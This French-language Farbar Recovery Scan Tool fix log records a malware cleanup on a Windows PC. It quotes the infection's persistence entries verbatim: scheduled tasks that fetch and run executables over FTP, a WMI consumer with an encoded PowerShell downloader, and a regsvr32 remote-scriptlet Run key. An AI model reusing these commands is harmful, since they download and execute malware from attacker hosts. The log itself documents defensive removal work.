Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13.02.2019
Exécuté par seb (14-02-2019 20:15:14) Run:4
Exécuté depuis C:\Users\seb\Desktop
Profils chargés: seb (Profils disponibles: seb)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Task: {1FF2DB49-364D-42D1-A22F-5EAD92D9C902} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {5F22F020-85DC-43F5-AF33-335F1EAA696B} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {60A26944-0681-45A0-94A2-727A348B18A7} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {6E1E861E-0BCF-43C3-8E09-E7F588912B08} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {CAD45E7C-7798-439A-A197-E59A7093AB67} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (l'élément de données a 665 caractères en plus).] <==== ATTENTION
2017-07-17 18:30 - 2017-07-17 18:30 - 000863744 _____ () C:\Windows\mod_frst.exe
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{3331a2b2-bb14-47a8-a76b-967115585cb3} <==== ATTENTION (Restriction - IP)
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
C:\Users\seb\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
S2 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-08-26] (AVAST Software s.r.o. -> AVAST Software)
S3 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-08-26] (AVAST Software s.r.o. -> AVAST Software)
C:\Program Files (x86)\AVAST Software
2019-02-14 19:05 - 2019-02-14 19:05 - 010370944 _____ (AVAST Software) C:\Users\seb\Desktop\avastclear.exe
VirusTotal: C:\Windows\system32\upsupx.exe
VirusTotal: C:\Windows\system32\u.exe
VirusTotal: c:\windows\update.exe
VirusTotal: c:\windows\help\lsmosee.exe
VirusTotal: c:\windows\debug\item.dat
VirusTotal: c:\windows\debug\item.dat,ServiceMain aaaa
EmptyTemp:
*****************
Erreur: (0) Impossible de créer un point de restauration.
Processus fermé avec succès.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{1FF2DB49-364D-42D1-A22F-5EAD92D9C902}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1FF2DB49-364D-42D1-A22F-5EAD92D9C902}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Mysa => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{5F22F020-85DC-43F5-AF33-335F1EAA696B}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5F22F020-85DC-43F5-AF33-335F1EAA696B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Mysa3 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa3" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{60A26944-0681-45A0-94A2-727A348B18A7}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{60A26944-0681-45A0-94A2-727A348B18A7}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Mysa2 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{6E1E861E-0BCF-43C3-8E09-E7F588912B08}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E1E861E-0BCF-43C3-8E09-E7F588912B08}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\Mysa1 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa1" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{CAD45E7C-7798-439A-A197-E59A7093AB67}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAD45E7C-7798-439A-A197-E59A7093AB67}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ok => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ok" => supprimé(es) avec succès
"CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\"" => supprimé(es) avec succès
"fuckyoumm3" => supprimé(es) avec succès
"fuckyoumm4" => supprimé(es) avec succès
"C:\Windows\mod_frst.exe" => non trouvé(e)
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => supprimé(es) avec succès
"HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
C:\Users\seb\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => déplacé(es) avec succès
HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\avast => supprimé(es) avec succès
avast => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\avastm => supprimé(es) avec succès
avastm => service supprimé(es) avec succès
C:\Program Files (x86)\AVAST Software => déplacé(es) avec succès
C:\Users\seb\Desktop\avastclear.exe => déplacé(es) avec succès
VirusTotal: C:\Windows\system32\upsupx.exe => https://www.virustotal.com/file/790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd/analysis/1549985375/
VirusTotal: C:\Windows\system32\u.exe => https://www.virustotal.com/file/46bc86cff88521671e70edbbadbc17590305c8f91169f777635e8f529ac21044/analysis/1549712053/
VirusTotal: c:\windows\update.exe => https://www.virustotal.com/file/fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5/analysis/1549808801/
"VirusTotal: c:\windows\help\lsmosee.exe" => non trouvé(e)
VirusTotal: c:\windows\debug\item.dat => https://www.virustotal.com/file/378b01c3fcd8a0db6c4974f35591531a7f236f9f10b41a527ab4a9c09053f56b/analysis/1548430173/
"VirusTotal: c:\windows\debug\item.dat,ServiceMain aaaa" => non trouvé(e)
=========== EmptyTemp: ==========
BITS transfer queue => 4194304 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17766562 B
Java, Flash, Steam htmlcache => 1998 B
Windows/system/drivers => 0 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 670848 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 0 B
seb => 301421152 B
RecycleBin => 0 B
EmptyTemp: => 309 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 20:15:39 ====